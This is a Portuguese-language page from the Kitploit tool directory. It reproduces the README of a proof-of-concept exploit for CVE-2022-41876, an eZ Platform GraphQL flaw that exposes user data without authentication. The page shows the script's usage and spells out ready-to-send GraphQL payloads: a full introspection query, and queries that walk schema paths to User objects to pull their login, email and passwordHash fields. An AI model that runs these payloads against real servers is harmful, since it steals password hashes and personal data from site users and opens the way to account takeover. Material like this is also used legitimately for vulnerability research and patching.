Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-41876 — PoC para CVE-2022-41876 | Kitploit
Ferramentas/GitHubGitHub/skileau/cve-2022-41876
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubskileau/cve-2022-41876

CVE-2022-41876

PoC para CVE-2022-41876

Ver Repositório
71há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
logotipo do Ibexa

Python3.9 current version
Twitter Skilo Twitter TahiTi

CVE-2022-41876 - Divulgação de informações de usuários do eZ Platform

Uma vulnerabilidade surgiu no eZ Platform que permite que um usuário não autenticado acesse o hash de senha de cada colaborador. Este PoC enumera todos os caminhos GraphQL possíveis que levam a um objeto 'User' e, em seguida, solicita esses caminhos para recuperar informações confidenciais dos usuários.

Uso

root@kitploit:~
python3 cve-2022-41876.py -h
root@kitploit:~
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   URL alvo (especifique o endpoint graphql)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Número de threads
  -f FILE, --file FILE  Caminho local para o arquivo de introspecção

Resultados

image

Como funciona?

Os diferentes passos seguidos por esta ferramenta para explorar a CVE são:

Obtendo o arquivo de introspecção

O primeiro passo para explorar esta CVE é obter um arquivo introspect.json. Uma maneira de obtê-lo é consultar o endpoint graphql do servidor com o seguinte payload:

root@kitploit:~
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}

Encontrando caminhos para objetos User

Então, o json fornecido pelo servidor pode ser usado para extrair todos os caminhos para os objetos 'User' com a ferramenta graphql-enum-path assim:

image

Solicitando os caminhos encontrados para obter dados dos usuários

Finalmente, uma vez que todos os caminhos são encontrados, um payload específico deve ser criado desta forma e enviado ao servidor:

root@kitploit:~
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}

Onde os elementos correspondem aos textos entre colchetes no resultado do graphql-enum-path (note que uma consulta deve ser feita para cada caminho).

Então, com o exemplo do graphql-enum-path acima, o primeiro payload seria:

root@kitploit:~
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}

Se o servidor for vulnerável a esta CVE, ele responderá a essa consulta com um arquivo json contendo os dados de seus usuários.

Referências

Hacktricks

graphql-enum-path

Créditos

Este PoC foi criado por @Skilo e @TahiTi

Baixar ferramenta